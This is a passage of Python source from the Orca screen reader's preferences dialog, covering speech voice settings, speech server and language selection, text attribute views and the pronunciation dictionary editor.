            return voice[key]
        return None

    def _getFamilyNameForVoiceType(self, voiceType):
        """Get the voice family name configured for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the name of the voice family for the given voice type,
        or None if not set.
        """

        family = self._getKeyValueForVoiceType(voiceType, acss.ACSS.FAMILY)
        if family and speechserver.VoiceFamily.NAME in family:
            return family[speechserver.VoiceFamily.NAME]
        return None

    def _setFamilyNameForVoiceType(self, voiceType, name, language, dialect, variant):
        """Sets the voice family for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - name: the name of the voice family to set.
        - language: the locale of the voice family to set.
        - dialect: the dialect of the voice family to set.
        - variant: the variant of the voice family to set.
        """

        family = self._getKeyValueForVoiceType(voiceType,
                                               acss.ACSS.FAMILY,
                                               False)
        voiceACSS = self._getACSSForVoiceType(voiceType)

        # Mutate the existing family dict in place when there is one;
        # otherwise install a fresh dict on the voice.  (The original
        # duplicated the four key assignments across both branches.)
        if not family:
            family = voiceACSS[acss.ACSS.FAMILY] = {}
        family[speechserver.VoiceFamily.NAME] = name
        family[speechserver.VoiceFamily.LANG] = language
        family[speechserver.VoiceFamily.DIALECT] = dialect
        family[speechserver.VoiceFamily.VARIANT] = variant

        voiceACSS['established'] = True

    def _getRateForVoiceType(self, voiceType):
        """Return the speaking rate for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the rate value, or None if not set.
        """

        rate = self._getKeyValueForVoiceType(voiceType, acss.ACSS.RATE)
        return rate

    def _setRateForVoiceType(self, voiceType, value):
        """Set the speaking rate for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - value: the rate value to set.
        """

        voice = self._getACSSForVoiceType(voiceType)
        voice[acss.ACSS.RATE] = value
        # Mark the voice as explicitly configured by the user.
        voice['established'] = True

    def _getPitchForVoiceType(self, voiceType):
        """Return the average pitch for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the pitch value, or None if not set.
        """

        pitch = self._getKeyValueForVoiceType(voiceType,
                                              acss.ACSS.AVERAGE_PITCH)
        return pitch

    def _setPitchForVoiceType(self, voiceType, value):
        """Set the average pitch for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - value: the pitch value to set.
        """

        voice = self._getACSSForVoiceType(voiceType)
        voice[acss.ACSS.AVERAGE_PITCH] = value
        # Mark the voice as explicitly configured by the user.
        voice['established'] = True

    def _getVolumeForVoiceType(self, voiceType):
        """Return the volume (gain) for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the volume (gain) value, or None if not set.
        """

        volume = self._getKeyValueForVoiceType(voiceType, acss.ACSS.GAIN)
        return volume

    def _setVolumeForVoiceType(self, voiceType, value):
        """Set the volume (gain) for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - value: the volume (gain) value to set.
        """

        voice = self._getACSSForVoiceType(voiceType)
        voice[acss.ACSS.GAIN] = value
        # Mark the voice as explicitly configured by the user.
        voice['established'] = True

    def _setVoiceSettingsForVoiceType(self, voiceType):
        """Sync the family, rate, pitch and volume GUI components to the
        given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        """

        self._setSpeechFamiliesChoice(
            self._getFamilyNameForVoiceType(voiceType))

        # Each scale falls back to its stock default when the preference
        # is unset.
        scales = (("rateScale", self._getRateForVoiceType, 50.0),
                  ("pitchScale", self._getPitchForVoiceType, 5.0),
                  ("volumeScale", self._getVolumeForVoiceType, 10.0))
        for widgetName, getter, fallback in scales:
            value = getter(voiceType)
            if value is None:
                value = fallback
            self.get_widget(widgetName).set_value(value)

    def _setSpeechFamiliesChoice(self, familyName):
        """Sets the active item in the families ("Person:") combo box
        to the given family name.

        Arguments:
        - familyName: the family name to use to set the active combo box item.
        """

        if len(self.speechFamilies) == 0:
            return

        languageSet = False
        familySet = False
        # Find the family by name; its language determines which entry of
        # the languages combo to activate.  The families combo is then
        # rebuilt for that language and the family itself selected.
        for family in self.speechFamilies:
            name = family[speechserver.VoiceFamily.NAME]
            if name == familyName:
                lang = family[speechserver.VoiceFamily.LANG]
                dialect = family[speechserver.VoiceFamily.DIALECT]

                if dialect:
                    language = lang + '-' + dialect
                else:
                    language = lang

                i = 0
                for languageChoice in self.speechLanguagesChoices:
                    if languageChoice == language:
                        self.get_widget("speechLanguages").set_active(i)
                        self.speechLanguagesChoice = self.speechLanguagesChoices[i]
                        languageSet = True

                        # Rebuild the families combo for the newly
                        # selected language.
                        self._setupFamilies()

                        i = 0
                        for familyChoice in self.speechFamiliesChoices:
                            name = familyChoice[speechserver.VoiceFamily.NAME]
                            if name == familyName:
                                self.get_widget("speechFamilies").set_active(i)
                                self.speechFamiliesChoice = self.speechFamiliesChoices[i]
                                familySet = True
                                break
                            i += 1

                        break

                    i += 1

                break

        if not languageSet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech language match for %s" \
                          % familyName)
            self.get_widget("speechLanguages").set_active(0)
            self.speechLanguagesChoice = self.speechLanguagesChoices[0]

        # NOTE(review): by this point `i` has been reset by the inner
        # family loop, so the value stored below is the family index,
        # not the language index -- confirm this is intended.
        if languageSet:
            self.selectedLanguageChoices[self.speechServersChoice] = i

        if not familySet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech family match for %s" \
                          % familyName)
            self.get_widget("speechFamilies").set_active(0)
            self.speechFamiliesChoice = self.speechFamiliesChoices[0]

        if familySet:
            self.selectedFamilyChoices[self.speechServersChoice,
                    self.speechLanguagesChoice] = i

    def _setupFamilies(self):
        """Rebuild the families ("Person:") combo box with the voice
        variants that the current speech server offers for the current
        language, then restore the user's prior family selection (or the
        first, usually default, entry).
        """

        self.speechFamiliesModel.clear()

        currentLanguage = self.speechLanguagesChoice

        self.speechFamiliesChoices = []
        index = 0
        for family in self.speechFamilies:
            lang = family[speechserver.VoiceFamily.LANG]
            dialect = family[speechserver.VoiceFamily.DIALECT]
            language = lang + '-' + dialect if dialect else lang

            # Only families matching the currently selected language.
            if language != currentLanguage:
                continue

            self.speechFamiliesChoices.append(family)
            self.speechFamiliesModel.append(
                (index, family[speechserver.VoiceFamily.NAME]))
            index += 1

        if not self.speechFamiliesChoices:
            debug.println(debug.LEVEL_SEVERE, "No speech family was available for %s." % str(currentLanguage))
            debug.printStack(debug.LEVEL_FINEST)
            self.speechFamiliesChoice = None
            return

        # If the user manually selected a family for the current speech
        # server and language, restore that choice; otherwise select the
        # first (usually default) entry.
        key = (self.speechServersChoice, self.speechLanguagesChoice)
        selectedIndex = self.selectedFamilyChoices.get(key, 0)

        self.get_widget("speechFamilies").set_active(selectedIndex)

    def _setSpeechLanguagesChoice(self, languageName):
        """Sets the active item in the languages ("Language:") combo box
        to the given language name.

        Arguments:
        - languageName: the language name to use to set the active combo box item.
        """

        # A stray debug print("setSpeechLanguagesChoice") was removed here.

        if len(self.speechLanguagesChoices) == 0:
            return

        valueSet = False
        for i, language in enumerate(self.speechLanguagesChoices):
            if language == languageName:
                self.get_widget("speechLanguages").set_active(i)
                self.speechLanguagesChoice = self.speechLanguagesChoices[i]
                valueSet = True
                break

        if not valueSet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech language match for %s" \
                          % languageName)
            self.get_widget("speechLanguages").set_active(0)
            self.speechLanguagesChoice = self.speechLanguagesChoices[0]

        # Remember the user's choice for this speech server.
        if valueSet:
            self.selectedLanguageChoices[self.speechServersChoice] = i

        self._setupFamilies()

    def _setupVoices(self):
        """Gets the list of voices for the current speech server.
        If there are families, get the information associated with
        each voice family and add an entry for it to the families
        GtkComboBox list.
        """

        self.speechLanguagesModel.clear()

        self.speechFamilies = self.speechServersChoice.getVoiceFamilies()

        self.speechLanguagesChoices = []

        if len(self.speechFamilies) == 0:
            debug.println(debug.LEVEL_SEVERE, "No speech voice was available.")
            debug.printStack(debug.LEVEL_FINEST)
            self.speechLanguagesChoice = None
            return

        # Deduplicate (language, dialect) pairs so each language appears
        # only once in the languages combo box.
        done = {}
        i = 0
        for family in self.speechFamilies:
            lang = family[speechserver.VoiceFamily.LANG]
            dialect = family[speechserver.VoiceFamily.DIALECT]
            if (lang,dialect) in done:
                continue
            done[lang,dialect] = True

            if dialect:
                language = lang + '-' + dialect
            else:
                language = lang

            # TODO: get translated language name from CLDR or such
            msg = language
            if msg == "":
                # Unsupported locale
                msg = "default language"

            self.speechLanguagesChoices.append(language)
            self.speechLanguagesModel.append((i, msg))
            i += 1

        # If the user manually selected a language for the current speech
        # server, that choice is restored.  Otherwise the first language
        # (usually the default one) is selected.
        #
        selectedIndex = 0
        if self.speechServersChoice in self.selectedLanguageChoices:
            selectedIndex = self.selectedLanguageChoices[self.speechServersChoice]

        self.get_widget("speechLanguages").set_active(selectedIndex)
        if self.initializingSpeech:
            self.speechLanguagesChoice = self.speechLanguagesChoices[selectedIndex]

        self._setupFamilies()

        # The family name will be selected as part of selecting the
        # voice type.  Whenever the families change, we'll reset the
        # voice type selection to the first one ("Default").
        #
        comboBox = self.get_widget("voiceTypesCombo")
        types = [guilabels.SPEECH_VOICE_TYPE_DEFAULT,
                 guilabels.SPEECH_VOICE_TYPE_UPPERCASE,
                 guilabels.SPEECH_VOICE_TYPE_HYPERLINK,
                 guilabels.SPEECH_VOICE_TYPE_SYSTEM]
        self.populateComboBox(comboBox, types)
        comboBox.set_active(DEFAULT)
        voiceType = comboBox.get_active()
        self._setVoiceSettingsForVoiceType(voiceType)

    def _setSpeechServersChoice(self, serverInfo):
        """Sets the active item in the speech servers combo box to the
        given server.  (The original docstring documented a nonexistent
        `serversChoices` parameter.)

        Arguments:
        - serverInfo: the speech server to use to set the active combo
        box item.
        """

        if len(self.speechServersChoices) == 0:
            return

        # We'll fallback to whatever we happen to be using in the event
        # that this preference has never been set.
        #
        if not serverInfo:
            serverInfo = speech.getInfo()

        valueSet = False
        for i, server in enumerate(self.speechServersChoices):
            if serverInfo == server.getInfo():
                self.get_widget("speechServers").set_active(i)
                self.speechServersChoice = server
                valueSet = True
                break

        if not valueSet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech server match for %s" \
                          %  repr(serverInfo))
            self.get_widget("speechServers").set_active(0)
            self.speechServersChoice = self.speechServersChoices[0]

        self._setupVoices()

    def _setupSpeechServers(self):
        """Fill the speechServers combo box with the servers offered by
        the currently selected speech system, then activate the user's
        preferred server (first entry by default).
        """

        self.speechServersModel.clear()
        self.speechServersChoices = \
                self.speechSystemsChoice.SpeechServer.getSpeechServers()
        if not self.speechServersChoices:
            # Without servers there is nothing to drive the language and
            # family combo boxes either; reset the whole cascade.
            debug.println(debug.LEVEL_SEVERE, "Speech not available.")
            debug.printStack(debug.LEVEL_FINEST)
            self.speechServersChoice = None
            self.speechLanguagesChoices = []
            self.speechLanguagesChoice = None
            self.speechFamiliesChoices = []
            self.speechFamiliesChoice = None
            return

        for index, server in enumerate(self.speechServersChoices):
            self.speechServersModel.append((index, server.getInfo()[0]))

        self._setSpeechServersChoice(self.prefsDict["speechServerInfo"])

        debug.println(
            debug.LEVEL_FINEST,
            "orca_gui_prefs._setupSpeechServers: speechServersChoice: %s" \
            % self.speechServersChoice.getInfo())

    def _setSpeechSystemsChoice(self, systemName):
        """Set the active item in the speech systems combo box to the
        given system name.  (The original docstring documented a
        nonexistent `factoryChoices` parameter.)

        Arguments:
        - systemName: the speech system name to use to set the active combo
        box item.
        """

        # Saved names may be quoted, e.g. "'speechdispatcherfactory'".
        systemName = systemName.strip("'")

        if len(self.speechSystemsChoices) == 0:
            self.speechSystemsChoice = None
            return

        valueSet = False
        for i, speechSystem in enumerate(self.speechSystemsChoices):
            # Match on the module name's suffix, e.g.
            # "orca.speechdispatcherfactory" vs "speechdispatcherfactory".
            if speechSystem.__name__.endswith(systemName):
                self.get_widget("speechSystems").set_active(i)
                self.speechSystemsChoice = self.speechSystemsChoices[i]
                valueSet = True
                break

        if not valueSet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech system match for %s" \
                          % systemName)
            self.get_widget("speechSystems").set_active(0)
            self.speechSystemsChoice = self.speechSystemsChoices[0]

        self._setupSpeechServers()

    def _setupSpeechSystems(self, factories):
        """Sets up the speech systems combo box and sets the selection
        to the preferred speech system.

        Arguments:
        - factories: the list of known speech factories (working or not)
        """
        self.speechSystemsModel.clear()

        # Probe each factory; one that raises or reports no servers is
        # considered non-working and is skipped.
        self.workingFactories = []
        for factory in factories:
            try:
                if factory.SpeechServer.getSpeechServers():
                    self.workingFactories.append(factory)
            except Exception:
                debug.printException(debug.LEVEL_FINEST)

        self.speechSystemsChoices = []
        if not self.workingFactories:
            # Nothing usable: clear every downstream speech choice.
            debug.println(debug.LEVEL_SEVERE, "Speech not available.")
            debug.printStack(debug.LEVEL_FINEST)
            self.speechSystemsChoice = None
            self.speechServersChoices = []
            self.speechServersChoice = None
            self.speechLanguagesChoices = []
            self.speechLanguagesChoice = None
            self.speechFamiliesChoices = []
            self.speechFamiliesChoice = None
            return

        # Each combo box row is (index, factory name).
        for i, workingFactory in enumerate(self.workingFactories):
            self.speechSystemsChoices.append(workingFactory)
            name = workingFactory.SpeechServer.getFactoryName()
            self.speechSystemsModel.append((i, name))

        if self.prefsDict["speechServerFactory"]:
            self._setSpeechSystemsChoice(self.prefsDict["speechServerFactory"])
        else:
            self.speechSystemsChoice = None

        debug.println(
            debug.LEVEL_FINEST,
            "orca_gui_prefs._setupSpeechSystems: speechSystemsChoice: %s" \
            % self.speechSystemsChoice)

    def _initSpeechState(self):
        """Initialize the various speech components.
        """

        voices = self.prefsDict["voices"]
        self.defaultVoice   = acss.ACSS(voices.get(settings.DEFAULT_VOICE))
        self.uppercaseVoice = acss.ACSS(voices.get(settings.UPPERCASE_VOICE))
        self.hyperlinkVoice = acss.ACSS(voices.get(settings.HYPERLINK_VOICE))
        self.systemVoice    = acss.ACSS(voices.get(settings.SYSTEM_VOICE))

        # Just a note on general naming pattern:
        #
        # *        = The name of the combobox
        # *Model   = the name of the combobox model
        # *Choices = the Orca/speech python objects
        # *Choice  = a value from *Choices
        #
        # Where * = speechSystems, speechServers, speechLanguages, speechFamilies
        #

        def resetSpeechChoices():
            # Clear all speech-related choice state when speech cannot be
            # used (no factories, speech disabled, or init failure).
            self.workingFactories = []
            self.speechSystemsChoice = None
            self.speechServersChoices = []
            self.speechServersChoice = None
            self.speechLanguagesChoices = []
            self.speechLanguagesChoice = None
            self.speechFamiliesChoices = []
            self.speechFamiliesChoice = None

        factories = _settingsManager.getSpeechServerFactories()
        if len(factories) == 0 or not self.prefsDict.get('enableSpeech', True):
            resetSpeechChoices()
            return

        try:
            speech.init()
        except Exception:
            resetSpeechChoices()
            return

        # This cascades into systems->servers->voice_type->families...
        #
        self.initializingSpeech = True
        self._setupSpeechSystems(factories)
        self.initializingSpeech = False

    def _setSpokenTextAttributes(self, view, setAttributes,
                                 state, moveToTop=False):
        """Given a set of spoken text attributes, update the model used by the
        text attribute tree view.

        Arguments:
        - view: the text attribute tree view.
        - setAttributes: the list of spoken text attributes to update.
        - state: the state (True or False) that they all should be set to.
        - moveToTop: if True, move these attributes to the top of the list.
        """

        model = view.get_model()
        # Detach the model while updating so the view isn't refreshed on
        # every row change; reattached at the end.
        view.set_model(None)

        [attrList, attrDict] = \
           self.script.utilities.stringToKeysAndDict(setAttributes)
        [allAttrList, allAttrDict] = self.script.utilities.stringToKeysAndDict(
            _settingsManager.getSetting('allTextAttributes'))

        for i in range(0, len(attrList)):
            # The localized strings depend only on the attribute being set,
            # so compute them once here instead of once per row scanned.
            localizedKey = text_attribute_names.getTextAttributeName(
                attrList[i], self.script)
            localizedValue = text_attribute_names.getTextAttributeName(
                attrDict[attrList[i]], self.script)
            for path in range(0, len(allAttrList)):
                if localizedKey == model[path][NAME]:
                    thisIter = model.get_iter(path)
                    model.set_value(thisIter, NAME, localizedKey)
                    model.set_value(thisIter, IS_SPOKEN, state)
                    model.set_value(thisIter, VALUE, localizedValue)
                    if moveToTop:
                        # Move the matched row up so enabled attributes
                        # appear first, in setAttributes order.
                        thisIter = model.get_iter(path)
                        otherIter = model.get_iter(i)
                        model.move_before(thisIter, otherIter)
                    break

        view.set_model(model)

    def _setBrailledTextAttributes(self, view, setAttributes, state):
        """Given a set of brailled text attributes, update the model used
        by the text attribute tree view.

        Arguments:
        - view: the text attribute tree view.
        - setAttributes: the list of brailled text attributes to update.
        - state: the state (True or False) that they all should be set to.
        """

        model = view.get_model()
        # Detach the model while updating so the view isn't refreshed on
        # every row change; reattached at the end.
        view.set_model(None)

        [attrList, attrDict] = \
            self.script.utilities.stringToKeysAndDict(setAttributes)
        [allAttrList, allAttrDict] = self.script.utilities.stringToKeysAndDict(
                _settingsManager.getSetting('allTextAttributes'))

        for i in range(0, len(attrList)):
            # The localized name depends only on the attribute being set,
            # so compute it once here instead of once per row scanned.
            localizedKey = text_attribute_names.getTextAttributeName(
                attrList[i], self.script)
            for path in range(0, len(allAttrList)):
                if localizedKey == model[path][NAME]:
                    thisIter = model.get_iter(path)
                    model.set_value(thisIter, IS_BRAILLED, state)
                    break

        view.set_model(model)

    def _getAppNameForAttribute(self, attributeName):
        """Converts the given Atk attribute name into the application's
        equivalent. This is necessary because an application or toolkit
        (e.g. Gecko) might invent entirely new names for the same text
        attributes.

        Arguments:
        - attributeName: The name of the text attribute

        Returns the application's equivalent name if found or attributeName
        otherwise.
        """

        # Thin wrapper; the actual mapping lives in the script's utilities.
        return self.script.utilities.getAppNameForAttribute(attributeName)

    def _updateTextDictEntry(self):
        """The user has updated the text attribute list in some way. Update
        the "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings to reflect the current state of the corresponding
        text attribute lists.
        """

        model = self.getTextAttributesView.get_model()
        # Collect the "key:value; " fragments and join once at the end,
        # rather than building the strings with repeated concatenation.
        spokenAttrs = []
        brailledAttrs = []
        noRows = model.iter_n_children(None)
        for path in range(0, noRows):
            localizedKey = model[path][NAME]
            key = text_attribute_names.getTextAttributeKey(localizedKey)

            # Convert the normalized, Atk attribute name back into what
            # the app/toolkit uses.
            #
            key = self._getAppNameForAttribute(key)

            localizedValue = model[path][VALUE]
            value = text_attribute_names.getTextAttributeKey(localizedValue)

            # Note: the preference strings deliberately end with "; ".
            entry = key + ":" + value + "; "
            if model[path][IS_SPOKEN]:
                spokenAttrs.append(entry)
            if model[path][IS_BRAILLED]:
                brailledAttrs.append(entry)

        self.prefsDict["enabledSpokenTextAttributes"] = "".join(spokenAttrs)
        self.prefsDict["enabledBrailledTextAttributes"] = "".join(brailledAttrs)

    def contractedBrailleToggled(self, checkbox):
        """Sync the contraction table grid sensitivity and the
        'enableContractedBraille' preference with the checkbox state."""
        isEnabled = checkbox.get_active()
        self.get_widget('contractionTableGrid').set_sensitive(isEnabled)
        self.prefsDict["enableContractedBraille"] = isEnabled

    def contractionTableComboChanged(self, combobox):
        """Record the newly selected braille contraction table (column 1 of
        the combo box model row) in the preferences dictionary."""
        activeIter = combobox.get_active_iter()
        selectedRow = combobox.get_model()[activeIter]
        self.prefsDict["brailleContractionTable"] = selectedRow[1]

    def flashPersistenceToggled(self, checkbox):
        """Sync the 'flashIsPersistent' preference with the checkbox; the
        duration grid only applies when messages are not persistent."""
        isPersistent = checkbox.get_active()
        self.get_widget('flashMessageDurationGrid').set_sensitive(
            not isPersistent)
        self.prefsDict["flashIsPersistent"] = isPersistent
        
    def textAttributeSpokenToggled(self, cell, path, model):
        """The user has toggled the state of one of the text attribute
        checkboxes to be spoken. Update our model to reflect this, then
        update the "enabledSpokenTextAttributes" preference string.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - model: the model that the cell is part of.
        """

        flipped = not model[path][IS_SPOKEN]
        model.set(model.get_iter(path), IS_SPOKEN, flipped)
        self._updateTextDictEntry()

    def textAttributeBrailledToggled(self, cell, path, model):
        """The user has toggled the state of one of the text attribute
        checkboxes to be brailled. Update our model to reflect this,
        then update the "enabledBrailledTextAttributes" preference string.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - model: the model that the cell is part of.
        """

        flipped = not model[path][IS_BRAILLED]
        model.set(model.get_iter(path), IS_BRAILLED, flipped)
        self._updateTextDictEntry()

    def textAttrValueEdited(self, cell, path, new_text, model):
        """The user has edited the value of one of the text attributes.
        Update our model to reflect this, then update the
        "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - new_text: the new text attribute value string.
        - model: the model that the cell is part of.
        """

        rowIter = model.get_iter(path)
        model.set(rowIter, VALUE, new_text)
        self._updateTextDictEntry()

    def textAttrCursorChanged(self, widget):
        """Set the search column in the text attribute tree view
        depending upon which column the user currently has the cursor in.
        """

        [path, focusColumn] = self.getTextAttributesView.get_cursor()
        if focusColumn:
            # Search on whichever column currently holds the cursor.
            for i, col in enumerate(self.getTextAttributesView.get_columns()):
                if focusColumn == col:
                    self.getTextAttributesView.set_search_column(i)
                    break

    def _createTextAttributesTreeView(self):
        """Create the text attributes tree view. The view is the
        textAttributesTreeView GtkTreeView widget. The view will consist
        of a list containing four columns:
          IS_SPOKEN   - a checkbox whose state indicates whether this text
                        attribute will be spoken or not.
          IS_BRAILLED - a checkbox whose state indicates whether this text
                        attribute will be marked in braille or not.
          NAME        - the text attribute name.
          VALUE       - if set, (and this attributes is enabled for speaking),
                        then this attribute will be spoken unless it equals
                        this value.
        """

        self.getTextAttributesView = self.get_widget("textAttributesTreeView")

        # Remove any columns left over from a previous invocation of this
        # method so we start from a clean view.
        if self.getTextAttributesView.get_columns():
            for column in self.getTextAttributesView.get_columns():
                self.getTextAttributesView.remove_column(column)

        # Store columns: NAME (str), IS_SPOKEN (bool), IS_BRAILLED (bool),
        # VALUE (str).
        model = Gtk.ListStore(GObject.TYPE_STRING,
                              GObject.TYPE_BOOLEAN,
                              GObject.TYPE_BOOLEAN,
                              GObject.TYPE_STRING)

        # Initially setup the list store model based on the values of all
        # the known text attributes.
        #
        [allAttrList, allAttrDict] = self.script.utilities.stringToKeysAndDict(
            _settingsManager.getSetting('allTextAttributes'))
        for i in range(0, len(allAttrList)):
            thisIter = model.append()
            localizedKey = text_attribute_names.getTextAttributeName(
                allAttrList[i], self.script)
            localizedValue = text_attribute_names.getTextAttributeName(
                allAttrDict[allAttrList[i]], self.script)
            model.set_value(thisIter, NAME, localizedKey)
            # All rows start unchecked; the _set*TextAttributes calls below
            # check the ones enabled in settings.
            model.set_value(thisIter, IS_SPOKEN, False)
            model.set_value(thisIter, IS_BRAILLED, False)
            model.set_value(thisIter, VALUE, localizedValue)

        self.getTextAttributesView.set_model(model)

        # Attribute Name column (NAME).
        column = Gtk.TreeViewColumn(guilabels.TEXT_ATTRIBUTE_NAME)
        column.set_min_width(250)
        column.set_resizable(True)
        renderer = Gtk.CellRendererText()
        column.pack_end(renderer, True)
        column.add_attribute(renderer, 'text', NAME)
        self.getTextAttributesView.insert_column(column, 0)

        # Attribute Speak column (IS_SPOKEN).
        speakAttrColumnLabel = guilabels.PRESENTATION_SPEAK
        column = Gtk.TreeViewColumn(speakAttrColumnLabel)
        renderer = Gtk.CellRendererToggle()
        column.pack_start(renderer, False)
        column.add_attribute(renderer, 'active', IS_SPOKEN)
        renderer.connect("toggled",
                         self.textAttributeSpokenToggled,
                         model)
        self.getTextAttributesView.insert_column(column, 1)
        # NOTE(review): emits the header's "clicked" signal immediately;
        # the intent is not evident from this file -- confirm it is needed.
        column.clicked()

        # Attribute Mark in Braille column (IS_BRAILLED).
        markAttrColumnLabel = guilabels.PRESENTATION_MARK_IN_BRAILLE
        column = Gtk.TreeViewColumn(markAttrColumnLabel)
        renderer = Gtk.CellRendererToggle()
        column.pack_start(renderer, False)
        column.add_attribute(renderer, 'active', IS_BRAILLED)
        renderer.connect("toggled",
                         self.textAttributeBrailledToggled,
                         model)
        self.getTextAttributesView.insert_column(column, 2)
        column.clicked()

        # Attribute Value column (VALUE)
        column = Gtk.TreeViewColumn(guilabels.PRESENTATION_PRESENT_UNLESS)
        renderer = Gtk.CellRendererText()
        renderer.set_property('editable', True)
        column.pack_end(renderer, True)
        column.add_attribute(renderer, 'text', VALUE)
        renderer.connect("edited", self.textAttrValueEdited, model)

        # NOTE(review): position 4 is past the three columns inserted above
        # (next free slot is 3); presumably GTK appends it at the end --
        # confirm against the Gtk.TreeView.insert_column docs.
        self.getTextAttributesView.insert_column(column, 4)

        # Check all the enabled (spoken) text attributes.
        #
        self._setSpokenTextAttributes(
            self.getTextAttributesView,
            _settingsManager.getSetting('enabledSpokenTextAttributes'),
            True, True)

        # Check all the enabled (brailled) text attributes.
        #
        self._setBrailledTextAttributes(
            self.getTextAttributesView,
            _settingsManager.getSetting('enabledBrailledTextAttributes'),
            True)

        # Connect a handler for when the user changes columns within the
        # view, so that we can adjust the search column for item lookups.
        #
        self.getTextAttributesView.connect("cursor_changed",
                                           self.textAttrCursorChanged)

    def pronActualValueEdited(self, cell, path, new_text, model):
        """The user has edited the value of one of the actual strings in
        the pronunciation dictionary. Update our model to reflect this.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - new_text: the new pronunciation dictionary actual string.
        - model: the model that the cell is part of.
        """

        rowIter = model.get_iter(path)
        model.set(rowIter, ACTUAL, new_text)

    def pronReplacementValueEdited(self, cell, path, new_text, model):
        """The user has edited the value of one of the replacement strings
        in the pronunciation dictionary. Update our model to reflect this.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - new_text: the new pronunciation dictionary replacement string.
        - model: the model that the cell is part of.
        """

        rowIter = model.get_iter(path)
        model.set(rowIter, REPLACEMENT, new_text)

    def pronunciationFocusChange(self, widget, event, isFocused):
        """Callback for the pronunciation tree's focus-{in,out}-event signal."""

        # Disable the dictionary while the tree has focus, re-enable it
        # when focus leaves.
        useDictionary = not isFocused
        _settingsManager.setSetting('usePronunciationDictionary', useDictionary)

    def pronunciationCursorChanged(self, widget):
        """Set the search column in the pronunciation dictionary tree view
        depending upon which column the user currently has the cursor in.
        """

        [path, focusColumn] = self.pronunciationView.get_cursor()
        if focusColumn:
            # Search on whichever column currently holds the cursor.
            for i, col in enumerate(self.pronunciationView.get_columns()):
                if focusColumn == col:
                    self.pronunciationView.set_search_column(i)
                    break

    def _createPronunciationTreeView(self):
        """Create the pronunciation dictionary tree view. The view is the
        pronunciationTreeView GtkTreeView widget. The view will consist
        of a list containing two columns:
          ACTUAL      - the actual text string (word).
          REPLACEMENT - the string that is used to pronounce that word.
        """

        self.pronunciationView = self.get_widget("pronunciationTreeView")

        # Remove any columns left over from a previous invocation of this
        # method so we start from a clean view.
        if self.pronunciationView.get_columns():
            for column in self.pronunciationView.get_columns():
                self.pronunciationView.remove_column(column)

        # Store columns: ACTUAL (str), REPLACEMENT (str).
        model = Gtk.ListStore(GObject.TYPE_STRING,
                              GObject.TYPE_STRING)

        # Initially setup the list store model based on the values of all
        # existing entries in the pronunciation dictionary -- unless it's
        # the default script.
        #
        if not self.script.app:
            _profile = self.prefsDict.get('activeProfile')[1]
            pronDict = _settingsManager.getPronunciations(_profile)
        else:
            pronDict = pronunciation_dict.pronunciation_dict
        for pronKey in sorted(pronDict.keys()):
            thisIter = model.append() 
            try:
                # Current format: each entry is an (actual, replacement) pair.
                actual, replacement = pronDict[pronKey]
            except:
                # Try to do something sensible for the previous format of
                # pronunciation dictionary entries. See bug #464754 for
                # more details.
                #
                actual = pronKey
                replacement = pronDict[pronKey]
            model.set(thisIter, 
                      ACTUAL, actual,
                      REPLACEMENT, replacement)

        self.pronunciationView.set_model(model)

        # Pronunciation Dictionary actual string (word) column (ACTUAL).
        column = Gtk.TreeViewColumn(guilabels.DICTIONARY_ACTUAL_STRING)
        column.set_min_width(250)
        column.set_resizable(True)
        renderer = Gtk.CellRendererText()
        renderer.set_property('editable', True)
        column.pack_end(renderer, True) 
        column.add_attribute(renderer, 'text', ACTUAL)
        renderer.connect("edited", self.pronActualValueEdited, model)
        self.pronunciationView.insert_column(column, 0)

        # Pronunciation Dictionary replacement string column (REPLACEMENT)
        column = Gtk.TreeViewColumn(guilabels.DICTIONARY_REPLACEMENT_STRING)
        renderer = Gtk.CellRendererText()
        renderer.set_property('editable', True)
        column.pack_end(renderer, True)
        column.add_attribute(renderer, 'text', REPLACEMENT)
        renderer.connect("edited", self.pronReplacementValueEdited, model)
        self.pronunciationView.insert_column(column, 1)

        self.pronunciationModel = model

        # Connect a handler for when the user changes columns within the
        # view, so that we can adjust the search column for item lookups.
        #
        self.pronunciationView.connect("cursor_changed",
                                       self.pronunciationCursorChanged)

        # Toggle the 'usePronunciationDictionary' setting as focus enters
        # and leaves the view (see pronunciationFocusChange).
        self.pronunciationView.connect(
            "focus_in_event", self.pronunciationFocusChange, True)
        self.pronunciationView.connect(
            "focus_out_event", self.pronunciationFocusChange, False)

    def _initGUIState(self):
        """Adjust the settings of the various components on the
        configuration GUI depending upon the users preferences.
        """

        prefs = self.prefsDict

        # Speech pane.
        #
        enable = prefs["enableSpeech"]
        self.get_widget("speechSupportCheckButton").set_active(enable)
        self.get_widget("speechOptionsGrid").set_sensitive(enable)

        enable = prefs["onlySpeakDisplayedText"]
        self.get_widget("onlySpeakDisplayedTextCheckButton").set_active(enable)
        self.get_widget("contextOptionsGrid").set_sensitive(not enable)

        if prefs["verbalizePunctuationStyle"] == \
